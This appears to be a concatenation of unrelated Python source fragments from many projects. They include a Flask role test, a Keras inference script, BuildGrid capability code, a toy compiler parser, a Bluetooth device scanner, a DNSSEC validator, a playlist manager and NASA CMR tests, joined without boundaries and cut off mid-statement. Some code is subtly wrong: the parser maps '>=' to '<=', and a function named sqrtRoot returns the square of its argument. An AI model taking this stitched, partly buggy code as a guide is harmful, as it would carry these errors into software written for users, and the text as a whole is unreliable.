self.assertIsNotNone(user_role) response = self.client.delete( self.url + str(user_id) + "/", follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) self.assertEqual(200, response.status_code) user_role = UserRoleModel.query.filter_by(user_id=user_id).first() self.assertIsNone(user_role) def test_user_roles(self): response = self.log_in(self.admin) user_id = response.json["id"] user = UserModel.query.get(user_id) self.assertEqual(user.roles, {2: "planner", 3: "admin"}) def test_user_no_roles(self): role = UserRoleModel.query.filter_by(user_id=self.viewer["id"]).delete() user = UserModel.query.get(self.viewer["id"]) self.assertEqual(user.roles, {}) 310652027/VRDL_HW1inference.py from keras.models import load_model from keras.models import Sequential test_path='?' #可在此輸入test_image路徑 out_path='?' #可在此輸入輸出路徑 model = Sequential() model = load_model('filepath+model-resnet50-final.h5') train = pd.read_csv('training_labels.txt', sep=" ", header=None) train.columns = ["id", "label"] y = train['label'].values integer_mapping = {x: i for i,x in enumerate(y)} vec = [integer_mapping[word] for word in y] y = np.array(y) label_encoder = LabelEncoder() vec = label_encoder.fit_transform(y) y = to_categorical(vec) ''' 抱歉以上這邊做得不夠好,當初在colab時並沒有做出另外一個檔案 來讀取model,所以這邊的y是原本讀取標籤內容所做的編號, 現在也需要用y的編號來重新輸出回新的txt內 ''' test = pd.read_csv('testing_img_order.txt', header=None) test.columns = ["id"] test_image = [] for i in tqdm(range(test.shape[0])): img = image.load_img(str(test_path) + str(test['id'][i]), target_size=(200,200,3)) #224 img = image.img_to_array(img) img = img/255 test_image.append(img) test = np.array(test_image) predict = model.predict(test) classes_x = np.argmax(predict,axis=1) vec = label_encoder.inverse_transform(classes_x) test = pd.read_csv('testing_img_order.txt', header=None) test.columns = ["id"] test['label'] = '' for i in tqdm(range(test.shape[0])): #test['label'][i] = int(classes_x[i]) test['label'][i] = vec[i] test.to_csv(out_path+'answer-max.txt', sep=" " ,header=None, index=None) from enum import Enum class UserType(Enum): CUSTOMER = 1 EMPLOYEE = 2 UNDEFINED = 3 def __str__(self): return "{}".format(self.name.upper()) # Copyright (C) 2018 Bloomberg LP # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging from buildgrid._protos.build.bazel.remote.execution.v2 import remote_execution_pb2 from buildgrid._protos.build.bazel.semver import semver_pb2 from buildgrid.settings import HIGH_REAPI_VERSION, LOW_REAPI_VERSION class CapabilitiesInstance: def __init__(self, cas_instance=None, action_cache_instance=None, execution_instance=None): self.__logger = logging.getLogger(__name__) self._instance_name = None self.__cas_instance = cas_instance self.__action_cache_instance = action_cache_instance self.__execution_instance = execution_instance self.__high_api_version = None self.__low_api_version = None # --- Public API --- @property def instance_name(self): return self._instance_name def register_instance_with_server(self, instance_name, server): """Names and registers the capabilities instance with a given server.""" if self._instance_name is None: server.add_capabilities_instance(self, instance_name) self._instance_name = instance_name else: raise AssertionError("Instance already registered") def add_cas_instance(self, cas_instance): self.__cas_instance = cas_instance def add_action_cache_instance(self, action_cache_instance): self.__action_cache_instance = action_cache_instance def add_execution_instance(self, execution_instance): self.__execution_instance = execution_instance def get_capabilities(self): cache_capabilities = self._get_cache_capabilities() execution_capabilities = self._get_capabilities_execution() if self.__high_api_version is None: self.__high_api_version = self._split_semantic_version(HIGH_REAPI_VERSION) if self.__low_api_version is None: self.__low_api_version = self._split_semantic_version(LOW_REAPI_VERSION) server_capabilities = remote_execution_pb2.ServerCapabilities() server_capabilities.cache_capabilities.CopyFrom(cache_capabilities) server_capabilities.execution_capabilities.CopyFrom(execution_capabilities) server_capabilities.low_api_version.CopyFrom(self.__low_api_version) server_capabilities.high_api_version.CopyFrom(self.__high_api_version) return server_capabilities # --- Private API --- def _get_cache_capabilities(self): capabilities = remote_execution_pb2.CacheCapabilities() action_cache_update_capabilities = remote_execution_pb2.ActionCacheUpdateCapabilities() if self.__cas_instance: capabilities.digest_function.extend([self.__cas_instance.hash_type()]) capabilities.max_batch_total_size_bytes = self.__cas_instance.max_batch_total_size_bytes() capabilities.symlink_absolute_path_strategy = self.__cas_instance.symlink_absolute_path_strategy() # TODO: execution priority #102 # capabilities.cache_priority_capabilities = if self.__action_cache_instance: capabilities.digest_function.extend([self.__action_cache_instance.hash_type()]) action_cache_update_capabilities.update_enabled = self.__action_cache_instance.allow_updates capabilities.action_cache_update_capabilities.CopyFrom(action_cache_update_capabilities) return capabilities def _get_capabilities_execution(self): capabilities = remote_execution_pb2.ExecutionCapabilities() if self.__execution_instance: capabilities.exec_enabled = True capabilities.digest_function = self.__execution_instance.hash_type() # TODO: execution priority #102 # capabilities.execution_priority = else: capabilities.exec_enabled = False return capabilities def _split_semantic_version(self, version_string): major_version, minor_version, patch_version = version_string.split('.') semantic_version = semver_pb2.SemVer() semantic_version.major = int(major_version) semantic_version.minor = int(minor_version) semantic_version.patch = int(patch_version) return semantic_version 1-10 # (C) Copyright 2005-2021 Enthought, Inc., Austin, TX # All rights reserved. # # This software is provided without warranty under the terms of the BSD # license included in LICENSE.txt and may be redistributed only under # the conditions described in the aforementioned license. The license # is also available online at http://www.enthought.com/licenses/BSD.txt # # Thanks for using Enthought open source! import abc class INotifier(abc.ABC): """ Interface for all notifiers. An instance of notifier must be a callable, i.e. ``__call__`` must be implemented and cannot be None. The signature of that callable should be compatible with the observables the notifier will be given to. This interface does not define what that signature should be. """ def __call__(self, *args, **kwargs): """ Called by an observable. The signature is not restricted by the interface. """ raise NotImplementedError("__call__ must be implemented.") def add_to(self, observable): """ Add this notifier to the observable. Parameters ---------- observable : IObservable """ raise NotImplementedError("add_to must be implemented.") def remove_from(self, observable): """ Remove this notifier or a notifier equivalent to this one from the observable. Parameters ---------- observable : IObservable Raises ------ NotifierNotFound If the notifier cannot be found. """ raise NotImplementedError("remove_from must be implemented.") #!/usr/bin/env python # -*- coding: utf-8 -*- import numpy as np from graphdot.codegen.cpptool import cpptype from ._base import MicroKernel def DotProduct(): r"""Creates a dot product microkernel, which computes the inner product between two vector-valued features. Parameters ---------- This kernel does not have any tunable hyperparameters. """ @cpptype([]) class DotProductKernel(MicroKernel): @property def name(self): return 'DotProduct' def __call__(self, X, Y, jac=False): X = np.asarray(X) Y = np.asarray(Y) if jac is True: return X @ Y, [] else: return X @ Y def __repr__(self): return f'{self.name}()' def gen_expr(self, x, y, theta_scope=''): return f'dotproduct({x}, {y})', [] @property def theta(self): return tuple() @theta.setter def theta(self, seq): pass @property def bounds(self): return tuple() @property def minmax(self): return (0, np.inf) return DotProductKernel() mbits-os/JiraDesktopbuild/win32/mui.rc.py0 import sys, langs as lng, strings with open(sys.argv[1], "rb") as infile: text = "".join([x.decode('utf-8') for x in infile]) toks = text.split("$(") prog = [(None, toks[0])] toks = toks[1:] names = {} for tok in toks: name, text = tok.split(')', 1) prog.append((name, text)) names[name] = "" full_lang = (int(sys.argv[5]) << 10) | int(sys.argv[4]) names["CODEPAGE"] = sys.argv[6] names["SUBLANG_ID"] = sys.argv[5] names["LANG_ID"] = sys.argv[4] names["LANG_HEX"] = hex(full_lang).split("0x", 1)[1] while len(names["LANG_HEX"]) < 4: names["LANG_HEX"] = "0" + names["LANG_HEX"] tr = strings.open(sys.argv[3]) app_name = tr.get(lng.LNG_APP_NAME) infotip = '"%s"' % tr.get(lng.LNG_APP_INFOTIP).replace('"', '""').replace("%1", app_name).replace("%2", '" PROGRAM_VERSION_STRING PROGRAM_VERSION_STABILITY "') names["LNG_APP_DESCRIPTION"] = '"%s"' % tr.get(lng.LNG_APP_DESCRIPTION).replace('"', '""') names["LNG_APP_LINK_INFOTIP"] = infotip.replace('%3"', '" VERSION_STRINGIFY(PROGRAM_VERSION_BUILD)').replace("%3", '" VERSION_STRINGIFY(PROGRAM_VERSION_BUILD) "') names["LNG_APP_NAME"] = '"%s"' % app_name.replace('"', '""') with open(sys.argv[2], "wb") as out: for p in prog: if p[0] is not None: out.write(names[p[0]].encode('utf-8')) out.write(p[1].encode('utf-8')) # Generated with SMOP 0.41 # main.m #African Vulture Optimization alghorithm # Read the following publication first and cite if you use it # @article{abdollahzadeh2021african, # title={African Vultures Optimization Algorithm: A New Nature-Inspired Metaheuristic Algorithm for Global Optimization Problems}, # author={ Gharehchopogh, }, # journal={Computers \& Industrial Engineering}, # pages={107408}, # year={2021}, # publisher={Elsevier}, # url = {https://www.sciencedirect.com/science/article/pii/S0360835221003120} # } from ObjectiveFunction import ObjectiveFunction from AVOA import AVOA from matplotlib.pyplot import * from numpy import * # Population size and stoppoing condition pop_size=30 # main.m:21 max_iter=100 # main.m:22 # Define your objective function's details here fobj=ObjectiveFunction # main.m:25 variables_no=2 # main.m:26 lower_bound=[-10 for i in range(variables_no)] # main.m:27 upper_bound=[10 for i in range(variables_no)] # main.m:28 Best_vulture1_F,Best_vulture1_X,convergence_curve=AVOA(pop_size,max_iter,lower_bound,upper_bound,variables_no,fobj,nargout=3) print('best_y=',Best_vulture1_F) print('best_x=',Best_vulture1_X) iters = [it for it in range(max_iter)] plot(iters, convergence_curve) show() # main.m:30 #figure # Best optimal values for the decision variables #subplot(1,2,1) #parallelcoords(Best_vulture1_X) #xlabel('Decision variables') #ylabel('Best estimated values ') #box('on') # Best convergence curve #subplot(1,2,2) #plot(convergence_curve) #title('Convergence curve of AVOA') #xlabel('Current_iteration') #ylabel('Objective value') #box('on') src/parse.py # Uzh # Author: import ast from .tools import error, type_name from .term import * OPERATORS = dict( And="&&", Or="||", Add="+", Sub="-", Mult="*", LShift="<<", RShift=">>", BitOr="|", BitXor="^", BitAnd="&", Invert="~", Not="!", USub="-", Eq="==", NotEq="!=", Lt="<", LtE="<=", Gt=">", GtE="<=" ) def ast_error(t): pos = ", line %s" % t.lineno if hasattr(t, "lineno") else "" error(("unsupported AST node '%s'" + pos) % type_name(t)) def make_parser(c): MOD_G = dict(host=lambda f: f) many = lambda t: [parse_ast(x) for x in t] def compare(t): if len(t.ops) == 1 and len(t.comparators) == 1: return BinOp( parse_op(t.ops[0]), parse_ast(t.left), parse_ast(t.comparators[0]), line=t.lineno ) ast_error(t) def bool_op(t): op, r = parse_op(t.op), parse_ast(t.values[0]) for v in t.values[1:]: r = BinOp(op, r, parse_ast(v), line=t.lineno) return r def subscript(t): if isinstance(t.slice, ast.Index): return Index(parse_ast(t.value), parse_ast(t.slice.value), line=t.lineno) ast_error(t) def assign(t): if len(t.targets) == 1 and \ isinstance(t.targets[0], (ast.Name, ast.Subscript)): return Assign(parse_ast(t.targets[0]), parse_ast(t.value), line=t.lineno) ast_error(t) def aug_assign(t): target = parse_ast(t.target) return Assign( target, BinOp(parse_op(t.op), target, parse_ast(t.value), line=t.lineno), line=t.lineno ) def while_stmt(t): if not t.orelse: return While(parse_ast(t.test), many(t.body), line=t.lineno) ast_error(t) def for_stmt(t): if not t.orelse: return For( parse_ast(t.target), parse_ast(t.iter), many(t.body), line=t.lineno ) ast_error(t) def is_macro(n): return n in c.macros and c.macros[n]["val"][0] == "macro" def eval_args(args): return [eval(compile(ast.Expression(body=x), c.filename, "eval"), MOD_G) for x in args] def call_macro(t): if isinstance(t.func, ast.Name) and is_macro(t.func.id): return c.macros[t.func.id]["func"](c, *eval_args(t.args)) return Call(parse_ast(t.func), many(t.args), line=t.lineno) def parse_op(t): n = type_name(t) if n in OPERATORS: return OPERATORS[n] ast_error(t) def parse_ast(t): n = type_name(t) if n in AST: return AST[n](t) ast_error(t) AST = dict( Name=lambda t: Id(t.id, line=t.lineno), Num=lambda t: Int(int(t.n), line=t.lineno), NameConstant=lambda t: Int(1 if t.value else 0, line=t.lineno), BinOp=lambda t: BinOp( parse_op(t.op), parse_ast(t.left), parse_ast(t.right), line=t.lineno ), UnaryOp=lambda t: UnOp( parse_op(t.op), parse_ast(t.operand), line=t.lineno ), Expr=lambda t: parse_ast(t.value), Call=call_macro, Return=lambda t: Return( parse_ast(t.value) if t.value else None, line=t.lineno ), If=lambda t: If( parse_ast(t.test), many(t.body), many(t.orelse), line=t.lineno ), Compare=compare, BoolOp=bool_op, Subscript=subscript, Assign=assign, AugAssign=aug_assign, While=while_stmt, For=for_stmt, Pass=lambda t: Nop(line=t.lineno) ) def parse_elem(x): if isinstance(x, (int, float)): return int(x) error("unsupported data type %s" % type(x)) def parse_data(data): if isinstance(data, list): return Array([parse_elem(x) for x in data]) return Const(parse_elem(data)) def make_var(t): n = t.targets[0].id val = parse_data(MOD_G[n]) return dict( name=n, val=val, offs=None ) def make_func(t): val = Func([x.arg for x in t.args.args], many(t.body), line=t.lineno) return dict( name=t.name, val=val, offs=None, args=len(val[1]), locs=dict([(v, i) for i, v in enumerate(val[1])]), ret=None ) def parse_module(body): g = {} for t in body: exec(compile(ast.Module(body=[t]), c.filename, "exec"), MOD_G) if isinstance(t, ast.Assign) and len(t.targets) == 1: if isinstance(t.targets[0], ast.Name): g[t.targets[0].id] = make_var(t) elif isinstance(t, ast.FunctionDef) and not t.decorator_list: g[t.name] = make_func(t) return g return lambda: parse_module(ast.parse(c.source, filename=c.filename).body) 10-100 ma = y.rolling(4).mean() ax = ma.plot(legend=True, label="MA[4]", figsize=(12, 4)) y.plot(ax=ax, label="Observed", legend=True);"""Get information about all devices on your network.""" from googledevices.helpers import gdh_session, gdh_sleep from googledevices.utils.convert import format_json def get_all_devices(loop, subnet): """Get information about all devices on your network.""" from googledevices.api.cast.bluetooth import Bluetooth from googledevices.utils.scan import NetworkScan from googledevices.api.cast.info import Info devices = {} async def get_device_info(host): """Grab device information.""" async with gdh_session() as session: googledevices = Info(host.get("host"), loop, session) await googledevices.get_device_info() ghname = googledevices.device_info.get("name") async with gdh_session() as session: googledevices = Bluetooth(host.get("host"), loop, session) await googledevices.scan_for_devices() await gdh_sleep() await googledevices.get_scan_result() for device in googledevices.devices: mac = device["mac_address"] if not devices.get(mac, False): # New device devices[mac] = {} devices[mac]["rssi"] = device.get("rssi") devices[mac]["ghunit"] = ghname elif devices[mac].get("rssi") < device.get("rssi"): # Better RSSI value on this device devices[mac]["rssi"] = device.get("rssi") devices[mac]["ghunit"] = ghname async def bluetooth_scan(): """Get devices from all GH units on the network.""" if not subnet: import netifaces gateway = netifaces.gateways().get("default", {}) ipscope = gateway.get(netifaces.AF_INET, ())[0][:-1] + "0/24" else: ipscope = subnet async with gdh_session() as session: googledevices = NetworkScan(loop, session) result = await googledevices.scan_for_units(ipscope) for host in result: if host["bluetooth"]: await get_device_info(host) print(format_json(devices)) loop.run_until_complete(bluetooth_scan()) nivelator_course/add_integer_numbers.py #Pidiendo los números number1 = int(input("Introduzca el primer número: ")) #Pidiendo el segundo número number2 = int(input("Introduzca el segundo número: ")) #Sumando los dos números e imprimiendo el resultado por pantalla result = str(number1 + number2) print("El resultado de la suma es: " + result)roeckelein/sprocket ''' rrsig_missing - RRSet test: RrsigMissing .. Copyright (c) 2015 Neustar, Inc. All rights reserved. .. See COPYRIGHT.txt for full notice. See LICENSE.txt for terms and conditions. ''' import time import dns.rdatatype import dns.rdtypes.ANY.RRSIG import dns.dnssec import dns_sprockets_lib.validators as validators class RrsigMissing(validators.RRSetTest): # pylint: disable=too-few-public-methods ''' Checks that all (non-RRSIG, non-delegated) RRSets are covered with an RRSIG. ''' TEST_DNSSECTYPE = True TEST_OPTARGS = { 'now': (None, 'Time to use for validating RRSIG time windows, e.g. 20150101123000'), 'now_offset': (None, 'Number of seconds to offset the "now" value, e.g. -86400)')} def __init__(self, args): self.now = None self.now_offset = None super(RrsigMissing, self).__init__(args) self.posix_now = (self.now and dns.rdtypes.ANY.RRSIG.sigtime_to_posixtime(self.now) or int(time.time())) if self.now_offset: self.posix_now += int(self.now_offset) def run(self, context, suggested_tested, name, rdataset): tested = None result = None # Only do this test for non-RRSIG, non-delegated RRSets: if (rdataset.rdtype != dns.rdatatype.RRSIG and not context.is_delegated(name)): tested = suggested_tested # Make sure there's a valid RRSIG for the rdataset: rrsigset = context.zone_obj.get_rdataset( name, 'RRSIG', covers=rdataset.rdtype) if not rrsigset: result = 'No RRSIG for name: %s' % (name) else: # Use dnspython's RRSIG validator: try: dns.dnssec.validate( (name, rdataset), (name, rrsigset), {context.zone_name: context.dnskey_rdataset}, now=self.posix_now) except dns.dnssec.UnsupportedAlgorithm as err: result = str(err) except dns.dnssec.ValidationFailure as err: result = str(err) return (tested, result) # end of file kyaaqba/magma #!/usr/bin/env python3 import ast import json import pycodestyle from gql_checker.__about__ import ( __author__, __copyright__, __email__, __license__, __summary__, __title__, __uri__, __version__, ) from graphql import Source, build_client_schema, parse, validate __all__ = [ "__title__", "__summary__", "__uri__", "__version__", "__author__", "__email__", "__license__", "__copyright__", ] GQL_SYNTAX_ERROR = "GQL100" GQL_VALIDATION_ERROR = "GQL101" class ImportVisitor(ast.NodeVisitor): """ This class visits all the gql calls. """ def __init__(self, filename, options): self.filename = filename self.options = options or {} self.calls = [] def visit_Call(self, node): # noqa if node.func.id == "gql": self.calls.append(node) def node_query(self, node): """ Return the query for the gql call node """ if isinstance(node, ast.Call): assert node.args arg = node.args[0] if not isinstance(arg, ast.Str): return else: raise TypeError(type(node)) return arg.s class ImportOrderChecker(object): visitor_class = ImportVisitor options = None def __init__(self, filename, tree): self.tree = tree self.filename = filename self.lines = None def load_file(self): if self.filename in ("stdin", "-", None): self.filename = "stdin" self.lines = pycodestyle.stdin_get_value().splitlines(True) else: self.lines = pycodestyle.readlines(self.filename) if not self.tree: self.tree = ast.parse("".join(self.lines)) def get_schema(self): gql_introspection_schema = self.options.get("gql_introspection_schema") if gql_introspection_schema: try: with open(gql_introspection_schema) as data_file: introspection_schema = json.load(data_file) return build_client_schema(introspection_schema) except IOError as e: raise Exception( "Cannot find the provided introspection schema. {}".format(str(e)) ) schema = self.options.get("schema") assert schema, "Need to provide schema" def validation_errors(self, ast): return validate(self.get_schema(), ast) def error(self, node, code, message): raise NotImplementedError() def check_gql(self): if not self.tree or not self.lines: self.load_file() visitor = self.visitor_class(self.filename, self.options) visitor.visit(self.tree) for node in visitor.calls: # Lines with the noqa flag are ignored entirely if pycodestyle.noqa(self.lines[node.lineno - 1]): continue query = visitor.node_query(node) if not query: continue try: source = Source(query, "gql query") ast = parse(source) except Exception as e: message = str(e) yield self.error(node, GQL_SYNTAX_ERROR, message) continue validation_errors = self.validation_errors(ast) if validation_errors: for error in validation_errors: message = str(error) yield self.error(node, GQL_VALIDATION_ERROR, message) import psycopg2 from sqlalchemy import create_engine # connection parameters hostname = '' username = '' password = '' database = '' dialect = '' #engine for alechemy engine = dialect + "://" + username + ":" + password +"@" + hostname + "/" + database #string for psycopg2 conn = psycopg2.connect( host=hostname, user=username, password=password, dbname=database ) # In python, you define a function like this # def funcname(parameter_list): # pass def sqrtRoot(param): return param * param # Calling the function print(sqrtRoot(2)) # You can also pass another function to a function as parameter def doSomething(funcX, paramX): return funcX(paramX) print(doSomething(sqrtRoot, 6)) # Lambda functions allows you to pass simple function inline without giving it a name print(doSomething(lambda x: x * x * x, 3)) from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np import tensorflow as tf from keras import layers, keras_parameterized from keras.utils.generic_utils import custom_object_scope from tfmiss.keras.testing_utils import layer_multi_io_test class OneToManyLayer(layers.Dense): def call(self, inputs): result = super(OneToManyLayer, self).call(inputs) return result, result + result def compute_output_shape(self, input_shape): result = super(OneToManyLayer, self).compute_output_shape(input_shape) return result, result @keras_parameterized.run_all_keras_modes class LayerMultiIOTestTest(keras_parameterized.TestCase): def test_one_to_one(self): layer_multi_io_test( layers.Dense, kwargs={'units': 10}, input_shapes=[(2, 4)], expected_output_shapes=[(None, 10)] ) layer_multi_io_test( layers.Dense, kwargs={'units': 10}, input_shapes=[(2, 4)], input_dtypes=['float32'], expected_output_dtypes=['float32'] ) layer_multi_io_test( layers.Dense, kwargs={'units': 10}, input_shapes=[(2, 4)], input_datas=[np.random.random((2, 4)).astype(np.float32)], expected_output_dtypes=['float32'] ) layer_multi_io_test( layers.Dense, kwargs={'units': 10, 'dtype': 'float16'}, input_shapes=[(2, 4)], input_dtypes=['float16'], input_datas=[np.random.random((2, 4)).astype(np.float16)], expected_output_shapes=[(None, 10)], expected_output_dtypes=['float16'] ) layer_multi_io_test( layers.Dense, kwargs={'units': 10, 'dtype': 'float16'}, input_datas=[np.random.random((2, 4))], input_dtypes=['float16'], expected_output_dtypes=['float16'] ) layer_multi_io_test( layers.Dense, kwargs={'units': 10, 'dtype': 'float16'}, input_datas=[np.random.random((2, 10)).astype(np.float16)], expected_output_dtypes=['float16'] ) def test_many_to_one(self): layer_multi_io_test( layers.Add, input_shapes=[(2, 4), (2, 4)], expected_output_shapes=[(None, 4)] ) def test_one_to_many(self): with custom_object_scope( {'OneToManyLayer': OneToManyLayer}): layer_multi_io_test( OneToManyLayer, kwargs={'units': 10}, input_shapes=[(2, 4)], expected_output_dtypes=['float32', 'float32'], expected_output_shapes=[(None, 10), (None, 10)] ) if __name__ == "__main__": tf.test.main() notebook/utils/prep.py import json import os from utils.bpconfig import BPConfig from sagemaker.s3 import S3Downloader # the sample v1.0 flow included as an example for this blueprint FLOW_NAME = "uci-bank-marketing-dataset.flow" def copy_sample_flow_to_local(workspace, local_dir) : config = BPConfig.get_config(workspace, local_dir) fname = f"{local_dir}/{FLOW_NAME}" flow_uri = f"s3://{workspace}/{config.ws_prefix()}/meta/{FLOW_NAME}" S3Downloader.download(flow_uri, local_dir) # Change the flow definition so that it references the dataset copied over by the user def _update_sample_flow_def(fname, s3_uri) : with open(fname, 'r+') as f: flow_def = json.loads(f.read()) nodes = flow_def["nodes"] for n in nodes : if n["type"] == "SOURCE" : data_def = n["parameters"]["dataset_definition"] dstype = data_def["datasetSourceType"] if dstype == "S3" : data_def["s3ExecutionContext"]["s3Uri"] = s3_uri f.seek(0) f.write(json.dumps(flow_def)) f.truncate() _update_sample_flow_def(fname, config.sample_data_uri()) return fname1000+ # coding=utf8 import json import logging from settings import MEDIA_ROOT logger = logging.getLogger('listenone.' + __name__) class Playlist(object): def __init__(self): self.cover_img_url = '' self.title = '' self.play_count = 0 self.list_id = '' manager_instance = None class PlaylistManager(object): default_path = MEDIA_ROOT + '/user/' + 'playlist.json' @classmethod def shared_instance(cls): global manager_instance if manager_instance is None: manager_instance = PlaylistManager() return manager_instance def __init__(self, path=None): self.path = self.default_path if path is None else path try: self.load_from_disk() self.nextid = 1 for l in self.mylists: listid = int(l['id'].split('_')[1]) if listid >= self.nextid: self.nextid = listid + 1 except: self.mylists = [] self.nextid = 1 def save_to_disk(self): s = json.dumps(self.mylists) with open(self.path, 'w') as f: f.write(s) def load_from_disk(self): with open(self.path, 'r') as f: s = f.read() self.mylists = json.loads(s) def get_playlist(self, list_id): targetlist = None for playlist in self.mylists: if playlist['id'] == list_id: targetlist = playlist break return targetlist def create_playlist( self, title, cover_img_url='/static/images/mycover.jpg', tracks=None): newlist_id = 'my_' + str(self.nextid) if tracks is None: my_tracks = [] else: my_tracks = tracks newlist = dict( title=title, id=newlist_id, cover_img_url=cover_img_url, tracks=my_tracks) self.nextid += 1 self.mylists.append(newlist) self.save_to_disk() return newlist_id def list_playlist(self): resultlist = [] for l in self.mylists: r = dict( cover_img_url=l['cover_img_url'], title=l['title'], play_count=0, list_id=l['id'],) resultlist.append(r) return resultlist def remove_playlist(self, list_id): target_index = -1 for index, playlist in enumerate(self.mylists): if playlist['id'] == list_id: target_index = index break self.mylists = self.mylists[:target_index] + \ self.mylists[target_index + 1:] self.save_to_disk() def is_exist_in_playlist(self, track_id, list_id): playlist = self.get_playlist(list_id) for d in playlist['tracks']: if d['id'] == track_id: return True return False def add_track_in_playlist(self, track, list_id): track_id = track['id'] if self.is_exist_in_playlist(track_id, list_id): return playlist = self.get_playlist(list_id) playlist['tracks'].append(track) self.save_to_disk() def remove_track_in_playlist(self, track_id, list_id): playlist = self.get_playlist(list_id) target_index = -1 for index, d in enumerate(playlist['tracks']): if d['id'] == track_id: target_index = index break playlist['tracks'] = playlist['tracks'][:target_index] + \ playlist['tracks'][target_index + 1:] marcostx/deepBatLearning from pyAudioAnalysis import audioBasicIO,audioFeatureExtraction import operator import numpy as np import os import cv2 import warnings warnings.filterwarnings('ignore') baseDataset = "dataset/" positivePath = 'PositiveRandom/' allDataPath = 'allPositiveData/' indexClass=[0,1,2,3,4,5,13,14,16] classesNames={} classCounter=[] c_C=0 X={} def featureExtractor(fileName): [Fs, x] = audioBasicIO.readAudioFile(fileName) Features = audioFeatureExtraction.stFeatureExtraction(x, Fs,0.001 * Fs, 0.0009 * Fs) MFCCs = [] for index in range(len(Features)): MFCCs.append(float(np.max(Features[index]))) return MFCCs def img2array(image): vector = [] for line in image: for column in line: vector.append(float(column[0])/255) return np.array(vector) def parseData(isImage=True): count = 0 for idx, val in enumerate(os.listdir(baseDataset)): if not val in classesNames.keys(): classesNames[val] = count count += 1 for idx_, img_folder in enumerate(os.listdir(baseDataset + val)): if idx_ > 0 and os.path.isdir(baseDataset + val + '/' + img_folder): for marker, audio in enumerate(os.listdir(baseDataset + val + '/' + img_folder)): if os.stat(baseDataset + val + '/' + img_folder +'/'+ audio).st_size==0: continue if marker > 0 and audio.endswith('WAV') and isImage: if not classesNames[val] in X.keys(): X[classesNames[val]] = baseDataset + val + '/' + img_folder + '/Spec/Crop/c' + audio.replace('WAV','png') else: X[classesNames[val]] = X[classesNames[ val]] + ',' + baseDataset + val + '/' + img_folder + '/Spec/Crop/c' + audio.replace('WAV','png') elif marker > 0 and audio.endswith('WAV') and not isImage: if not classesNames[val] in X.keys(): X[classesNames[val]] = baseDataset + val + '/' + img_folder +'/'+ audio else: X[classesNames[val]] = X[classesNames[ val]] + ',' + baseDataset + val + '/' + img_folder +'/'+ audio X_ = [] y_ = [] sorted_classesNames= sorted(classesNames.items(), key=operator.itemgetter(0)) realClass = 0 for classVal in range(len(sorted_classesNames)): if classVal in X.keys(): arquivos = X[classVal].split(',') print("accepting : ", classVal) for val in arquivos: if (isImage): img_ = cv2.imread(val) #img_ = img2array(img_) #img_ = img_.astype('float32') X_.append(img_) y_.append(realClass) else: X_.append(featureExtractor(val)) y_.append(realClass) realClass += 1 X_ = np.array(X_) y_ = np.array(y_) return X_, y_ # NASA EO-Metadata-Tools Python interface for the Common Metadata Repository (CMR) # # https://cmr.earthdata.nasa.gov/search/site/docs/search/api.html # # Copyright (c) 2020 United States Government as represented by the Administrator # of the National Aeronautics and Space Administration. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software distributed # under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either express or implied. See the License for the # specific language governing permissions and limitations under the License. """ Test cases for the cmr.auth package Author: - NASA Created: 2020-11-30 """ from unittest.mock import Mock from unittest.mock import patch import unittest import urllib.error as urlerr import test.cmr as tutil import cmr.util.common as common import cmr.search.common as scom # ****************************************************************************** def valid_cmr_response(file, status=200, headers=()): """return a valid login response""" json_response = common.read_file(file) return tutil.MockResponse(json_response, status=status, headers=headers) class TestSearch(unittest.TestCase): """Test suit for Search API""" # ********************************************************************** # Tests def test_meta_fields(self): """ Test that the meta fields are returned """ test = lambda exp, given, msg : self.assertEqual(exp, scom.meta_fields(given), msg) test({}, {}, "empty") test({'key':'value'}, {'key':'value'}, "unrelated") test('meta-value', {'meta':'meta-value'}, "found a meta") def test_umm_fields(self): """ Test that the UMM fields are returned """ test = lambda exp, given, msg : self.assertEqual(exp, scom.umm_fields(given), msg) test({}, {}, "empty") test({'key':'value'}, {'key':'value'}, "unrelated") test('umm-value', {'umm':'umm-value'}, "found a umm") def test_concept_id_fields(self): """ Test that the concept id fields are returned """ test = lambda exp, given, msg : self.assertEqual(exp, scom.concept_id_fields(given), msg) test({}, {}, "empty") test({'key':'value'}, {'key':'value'}, "unrelated") test({'concept-id':'C123'}, {'meta':{'concept-id':'C123'}}, "found a concept-id in meta") test({'concept-id':'C123'}, {'concept-id':'C123'}, "found a concept-id") # pylint: disable=W0212 def test_next_state(self): """Check that the sort by attribute is added correctly""" #setup orig_state = scom.create_page_state() # try once next_state = scom._next_page_state(orig_state, 10) self.assertEqual(10, next_state['took']) self.assertEqual(2, next_state['page_num']) # try again final_state = scom._next_page_state(next_state, 10) self.assertEqual(20, final_state['took']) self.assertEqual(3, final_state['page_num']) def test__error_object(self): """ Test that the Error Object is constructed correctly """ err = lambda code, msg : {'errors': [msg], 'code':code, 'reason':msg} # pylint: disable=C0301 # lambda lines can not be shorter test = lambda code, emsg, msg : self.assertEqual(err(code, emsg), scom._error_object(code, emsg), msg) test(None, None, "nones") test(200, "OK", "200 msg") test(500, "Server Error", "500 error") def test_create_state(self): """Test the function which generates a page state""" base_state = scom.create_page_state() self.assertEqual(10, base_state['page_size']) self.assertEqual(1, base_state['page_num']) self.assertEqual(0, base_state['took']) self.assertEqual(10, base_state['limit']) limit_state = scom.create_page_state(limit=None) self.assertEqual(10, limit_state['page_size']) self.assertEqual(10, limit_state['limit']) limit_state = scom.create_page_state(limit=1000) self.assertEqual(1000, limit_state['page_size']) self.assertEqual(1000, limit_state['limit']) limit_priority_state = scom.create_page_state(page_size=1500, limit=1200) self.assertEqual(1200, limit_priority_state['page_size']) self.assertEqual(1200, limit_priority_state['limit']) mixed_state = scom.create_page_state(page_size=1200, limit=1500) self.assertEqual(1500, mixed_state['page_size']) self.assertEqual(1500, mixed_state['limit']) high_state = scom.create_page_state(page_size=1000, limit=4000) self.assertEqual(2000, 